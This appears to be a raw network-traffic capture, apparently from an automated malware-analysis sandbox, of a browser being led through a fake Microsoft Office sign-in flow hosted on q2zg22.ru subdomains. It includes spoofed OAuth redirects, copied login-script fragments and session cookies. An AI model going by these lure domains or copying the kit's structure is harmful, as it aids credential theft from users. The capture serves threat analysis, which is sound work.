                                                                                                                          2024-02-02 19:17:50 UTC655OUTGET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1
                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://office.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:17:51 UTC716INHTTP/1.1 200 OK
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Age: 21739554
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Content-MD5: tUCo5RgDcZLjLE/li/Lbqw==
                                                                                                                          Content-Type: image/gif
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:51 GMT
                                                                                                                          Etag: 0x8DB5C3F492F3EE5
                                                                                                                          Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                                                                                          Server: ECAcc (aga/872E)
                                                                                                                          X-Cache: HIT
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-request-id: 790799df-401e-006b-6e54-908839000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          Content-Length: 3620
                                                                                                                          Connection: close
                                                                                                                          2024-02-02 19:17:51 UTC3620INData Raw: 47 49 46 38 39 61 60 01 03 00 f0 00 00 00 00 00 69 69 69 21 f9 04 09 05 00 00 00 21 fe 26 45 64 69 74 65 64 20 77 69 74 68 20 65 7a 67 69 66 2e 63 6f 6d 20 6f 6e 6c 69 6e 65 20 47 49 46 20 6d 61 6b 65 72 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 1f 69 19 07 ec 96 8a b2 51 34 af de bc fb 0f 86 e2 48 96 e6 89 a6 6a 0a 3d 99 6b 39 2d 35 5f f5 8a e7 fa ce f7 fe 0f 8c b4 6a 37 98 a6 28 7b 05 97 cc a6 f3 09 d5 15 00 00 21 f9 04 09 03 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 0f
                                                                                                                          Data Ascii: GIF89a`iii!!&Edited with ezgif.com online GIF maker!NETSCAPE2.0,`6PlHI:qJk`BYL*&!,`9iQ4Hj=k9-5_j7({!,`9


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          43192.168.2.1649772104.21.85.1894435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:51 UTC1405OUTGET /login HTTP/1.1
                                                                                                                          Host: react.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Referer: https://galeonconstruction.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; OH.DCAffinity=OH-ncu; OH.FLID=3541f66b-883d-474b-bada-1a5283ac2b01; .AspNetCore.OpenIdConnect.Nonce.BRvn3rzs0Fx_5xNILFknFSSGI5dXEmlBcn5X4QQ5QNlpVA6xeyBo_TJU2OfpJht4BiCRzFIPH4bMFRDqEyTVjaZ2vDv7O_B4abCma5RBRx4Ndlh8JAATMmjPEIgN1oafSJwkR_LDft6kYxxy01P2lvV6MSC7Hvtja9dxg7BUVA8dRhbZAcJ1hnTAs_6OtRDmQTi0fKrNrlyScAHbPcPqoJsTbkjgW-_C91YCKA92gmhFBpHie-DakzShY8oeu_La=N; .AspNetCore.Correlation.f46ORRH2Bty5lbsVWkATAtq4SHSGXz7ETalHeFWH9jA=N; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=
                                                                                                                          2024-02-02 19:17:51 UTC1192INHTTP/1.1 302 Found
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:51 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          Location: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&ui_locales=en-US&mkt=en-US&client-request-id=c9bbf586-3cb7-49e4-968c-855cb9b06dff&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0
                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                          Request-Context: appId=
                                                                                                                          Set-Cookie: OH.SID=; Path=/; Expires=Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                          2024-02-02 19:17:51 UTC1307INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 2e 41 73 70 4e 65 74 43 6f 72 65 2e 4f 70 65 6e 49 64 43 6f 6e 6e 65 63 74 2e 4e 6f 6e 63 65 2e 33 6a 68 4d 77 38 53 4a 6a 52 51 51 38 35 76 6a 6d 48 31 5f 37 34 56 58 39 68 4a 47 4e 6e 45 6b 41 63 69 77 63 44 35 74 49 42 54 79 6c 6c 4c 47 73 7a 4c 75 77 55 54 62 69 70 72 32 54 6b 4f 42 78 72 4d 6f 70 77 68 4c 68 74 45 52 36 64 44 6f 46 74 4c 35 61 35 36 55 72 69 33 7a 37 48 67 31 5a 4c 7a 72 66 72 41 35 61 2d 4c 6f 6f 77 43 53 36 42 48 53 5f 72 4e 51 4e 6c 5a 36 41 36 34 4f 4d 36 48 53 58 41 39 43 7a 56 4f 72 33 51 2d 58 65 59 4a 6d 68 51 77 79 53 6a 48 51 4d 49 56 47 58 58 4d 79 47 75 52 4e 73 56 75 31 33 6b 56 6d 44 78 52 7a 51 5f 52 75 4f 5f 57 53 4f 56 4c 2d 39 4e 62 56 30 32 4f 4b 31 2d 74 59 52 4d 66 6a 31 74 6b
                                                                                                                          Data Ascii: Set-Cookie: .AspNetCore.OpenIdConnect.Nonce.3jhMw8SJjRQQ85vjmH1_74VX9hJGNnEkAciwcD5tIBTyllLGszLuwUTbipr2TkOBxrMopwhLhtER6dDoFtL5a56Uri3z7Hg1ZLzrfrA5a-LoowCS6BHS_rNQNlZ6A64OM6HSXA9CzVOr3Q-XeYJmhQwySjHQMIVGXXMyGuRNsVu13kVmDxRzQ_RuO_WSOVL-9NbV02OK1-tYRMfj1tk
                                                                                                                          2024-02-02 19:17:51 UTC415INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 74 6d 5a 30 6d 50 69 55 56 6b 42 50 66 71 61 72 68 49 56 77 35 59 32 6d 70 70 31 43 69 4e 61 51 71 4c 53 33 62 6a 70 63 58 37 41 73 49 37 75 4f 33 68 49 38 4c 77 44 4d 6a 46 68 57 25 32 46 37 75 65 25 32 46 25 32 46 4e 66 6e 44 32 43 56 4e 79 52 66 34 30 47 25 32 42 4f 6c 66 75 67 5a 45 44 5a 6e 7a 61 25 32 46 69 37 34 61 49 4a 5a 25 32 42 75 33 44 7a 69 36 4b 4d 62 4e 4d 65 51 4d 25 32 42 46 44 78 63 77 45 6b 77 61 52 43 66 30 55 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65
                                                                                                                          Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tmZ0mPiUVkBPfqarhIVw5Y2mpp1CiNaQqLS3bjpcX7AsI7uO3hI8LwDMjFhW%2F7ue%2F%2FNfnD2CVNyRf40G%2BOlfugZEDZnza%2Fi74aIJZ%2Bu3Dzi6KMbNMeQM%2BFDxcwEkwaRCf0U%3D"}],"group":"cf-nel","max_age
                                                                                                                          2024-02-02 19:17:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          44192.168.2.1649771152.199.4.444435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:51 UTC425OUTGET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1
                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:17:51 UTC716INHTTP/1.1 200 OK
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Age: 21739554
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Content-MD5: Fm3lNHEmUlOrOkVt7+baIw==
                                                                                                                          Content-Type: image/gif
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:51 GMT
                                                                                                                          Etag: 0x8DB5C3F4982FD30
                                                                                                                          Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                                                                                          Server: ECAcc (aga/875B)
                                                                                                                          X-Cache: HIT
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-request-id: 0e8418e1-101e-008b-5454-90f28f000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          Content-Length: 2672
                                                                                                                          Connection: close
                                                                                                                          2024-02-02 19:17:51 UTC2672INData Raw: 47 49 46 38 39 61 60 01 03 00 f0 00 00 ff ff ff 96 96 96 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 06 00 00 00 30 00 03 00 00 02 1a 8c 01 16 88 ca ec 1e 3c f2 a9 18 1b b5 5b e6 9a 5c 4b 38 6a e5 74 72 a9 67 14 00 21 f9 04 09 03 00 00 00 2c 07 00 00 00 33 00 03 00 00 02 1a 8c 81 16 c8 ca ef 5e 3b 12 2a 0a e2 5c 55 4b df 5d 5c 86 25 e5 56 99 63 aa 14 00 21 f9 04 09 05 00 00 00 2c 0a 00 00 00 37 00 03 00 00 02 1a 8c 81 60 91 b9 ed 0e 6c 6f c6 c5 ee ac 90 5b bf 61 19 02 2a 52 77 7e 69 18 14 00 21
                                                                                                                          Data Ascii: GIF89a`!NETSCAPE2.0!,`6PlHI:qJk`BYL*&!,0<[\K8jtrg!,3^;*\UK]\%Vc!,7`lo[a*Rw~i!


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          45192.168.2.1649773152.199.4.444435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:51 UTC419OUTGET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1
                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:17:51 UTC716INHTTP/1.1 200 OK
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Age: 21739554
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Content-MD5: tUCo5RgDcZLjLE/li/Lbqw==
                                                                                                                          Content-Type: image/gif
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:51 GMT
                                                                                                                          Etag: 0x8DB5C3F492F3EE5
                                                                                                                          Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                                                                                          Server: ECAcc (aga/872E)
                                                                                                                          X-Cache: HIT
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-request-id: 790799df-401e-006b-6e54-908839000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          Content-Length: 3620
                                                                                                                          Connection: close
                                                                                                                          2024-02-02 19:17:51 UTC3620INData Raw: 47 49 46 38 39 61 60 01 03 00 f0 00 00 00 00 00 69 69 69 21 f9 04 09 05 00 00 00 21 fe 26 45 64 69 74 65 64 20 77 69 74 68 20 65 7a 67 69 66 2e 63 6f 6d 20 6f 6e 6c 69 6e 65 20 47 49 46 20 6d 61 6b 65 72 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 1f 69 19 07 ec 96 8a b2 51 34 af de bc fb 0f 86 e2 48 96 e6 89 a6 6a 0a 3d 99 6b 39 2d 35 5f f5 8a e7 fa ce f7 fe 0f 8c b4 6a 37 98 a6 28 7b 05 97 cc a6 f3 09 d5 15 00 00 21 f9 04 09 03 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 0f
                                                                                                                          Data Ascii: GIF89a`iii!!&Edited with ezgif.com online GIF maker!NETSCAPE2.0,`6PlHI:qJk`BYL*&!,`9iQ4Hj=k9-5_j7({!,`9


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          46192.168.2.1649776104.21.85.1894435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:51 UTC1042OUTGET /Me.htm?v=3 HTTP/1.1
                                                                                                                          Host: ywnjb.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-Dest: iframe
                                                                                                                          Referer: https://office.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; uaid=b5123cc0b5d34caeb3ca87efc9184692; MSPRequ=id=N&lt=1706901469&co=1; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=
                                                                                                                          2024-02-02 19:17:52 UTC1154INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:51 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          Expires: Mon, 30 Jan 2034 19:17:51 GMT
                                                                                                                          P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                          Ppserver: PPV: 30 H: SN1PEPF00010F79 V: 0
                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                          Set-Cookie: uaid=5b55c0a44eaf49cfa2da2d65c6420b02; Path=/; Domain=ywnjb.q2zg22.ru; HttpOnly; Secure; SameSite=None
                                                                                                                          Set-Cookie: MSPRequ=id=N&lt=1706901471&co=2; Path=/; Domain=ywnjb.q2zg22.ru; HttpOnly; Secure; SameSite=None
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Ms-Request-Id: b3a1c8be-11f0-49b4-b00f-00521606d53e
                                                                                                                          X-Ms-Route-Info: C106_SN1
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ThHgb6mXLbbT1sswKlA2H21cSEfynrEVsJT5oSde9DemAT2hw0lHfDFmyKnnFoCXYa%2F8CrMp0VBp0fMW%2Fh8wldXMo9rgivlYi036idriCwQWp%2BdNC61FYTFGF3qHyfHMhyA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c6d6b8341379-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:17:52 UTC215INData Raw: 39 31 39 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 21 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 74 29 6e 5b 65 5d 3d 74 5b 65 5d 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 69 29 7b 69 66 28 65 5b 69 5d 29 72 65 74 75 72 6e 20 65 5b 69 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 73 3d 65 5b 69 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 2c 69 64 3a 69 2c 6c 6f 61 64 65 64 3a 21 31 7d 3b 72 65 74 75 72 6e 20 6e 5b 69 5d 2e 63 61 6c 6c 28 73 2e 65 78 70 6f 72 74 73 2c 73 2c 73 2e 65 78 70 6f 72 74 73 2c 74
                                                                                                                          Data Ascii: 919<script type="text/javascript">!function(n,t){for(var e in t)n[e]=t[e]}(this,function(n){function t(i){if(e[i])return e[i].exports;var s=e[i]={exports:{},id:i,loaded:!1};return n[i].call(s.exports,s,s.exports,t
                                                                                                                          2024-02-02 19:17:52 UTC1369INData Raw: 29 2c 73 2e 6c 6f 61 64 65 64 3d 21 30 2c 73 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 65 3d 7b 7d 3b 72 65 74 75 72 6e 20 74 2e 6d 3d 6e 2c 74 2e 63 3d 65 2c 74 2e 70 3d 22 22 2c 74 28 30 29 7d 28 5b 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 6e 29 7b 66 6f 72 28 76 61 72 20 74 3d 67 5b 63 5d 2c 65 3d 30 2c 69 3d 74 2e 6c 65 6e 67 74 68 3b 65 3c 69 3b 2b 2b 65 29 69 66 28 74 5b 65 5d 3d 3d 3d 6e 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 69 28 6e 29 7b 69 66 28 21 6e 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 66 6f 72 28 76 61 72 20 74 3d 6e 2b 22 3d 22 2c 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 73 70 6c 69 74 28 22 3b 22 29 2c 69 3d 30 2c 73 3d 65 2e 6c 65 6e 67 74 68 3b 69
                                                                                                                          Data Ascii: ),s.loaded=!0,s.exports}var e={};return t.m=n,t.c=e,t.p="",t(0)}([function(n,t){function e(n){for(var t=g[c],e=0,i=t.length;e<i;++e)if(t[e]===n)return!0;return!1}function i(n){if(!n)return null;for(var t=n+"=",e=document.cookie.split(";"),i=0,s=e.length;i
                                                                                                                          2024-02-02 19:17:52 UTC752INData Raw: 65 29 7d 63 61 74 63 68 28 6f 29 7b 74 2e 65 72 72 6f 72 3d 6f 2e 6d 65 73 73 61 67 65 7d 6e 26 26 6c 2e 70 61 72 65 6e 74 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 2c 6e 29 7d 76 61 72 20 6c 3d 77 69 6e 64 6f 77 2c 63 3d 22 70 72 6f 64 22 2c 70 3d 22 22 2c 66 3d 22 22 2c 64 3d 7b 4e 6f 6e 65 3a 30 2c 53 69 67 6e 65 64 49 6e 54 6f 52 50 3a 31 2c 53 69 67 6e 65 64 49 6e 54 6f 49 44 50 3a 32 2c 52 65 6d 65 6d 62 65 72 65 64 3a 33 7d 2c 75 3d 7b 4e 6f 6e 65 3a 30 2c 49 73 57 69 6e 64 6f 77 73 53 73 6f 3a 31 7d 2c 67 3d 7b 64 65 76 3a 5b 70 2c 66 5d 2c 22 69 6e 74 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 77 69 6e 64 6f 77 73 2d 70 70 65 2e 6e 65 74 22 5d 2c 70 72 6f 64 3a 5b 22 68 74 74 70 73 3a 2f
                                                                                                                          Data Ascii: e)}catch(o){t.error=o.message}n&&l.parent.postMessage(JSON.stringify(t),n)}var l=window,c="prod",p="",f="",d={None:0,SignedInToRP:1,SignedInToIDP:2,Remembered:3},u={None:0,IsWindowsSso:1},g={dev:[p,f],"int":["https://login.windows-ppe.net"],prod:["https:/
                                                                                                                          2024-02-02 19:17:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          47192.168.2.1649775152.199.4.444435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:51 UTC655OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://office.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:17:51 UTC738INHTTP/1.1 200 OK
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Age: 21433400
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Content-MD5: DhdidjYrlCeaRJJRG/y9mA==
                                                                                                                          Content-Type: image/svg+xml
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:51 GMT
                                                                                                                          Etag: 0x8DB5C3F466DE917
                                                                                                                          Last-Modified: Wed, 24 May 2023 10:11:43 GMT
                                                                                                                          Server: ECAcc (aga/86F7)
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Cache: HIT
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-request-id: 49998f76-601e-005e-781c-935ce1000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          Content-Length: 1864
                                                                                                                          Connection: close
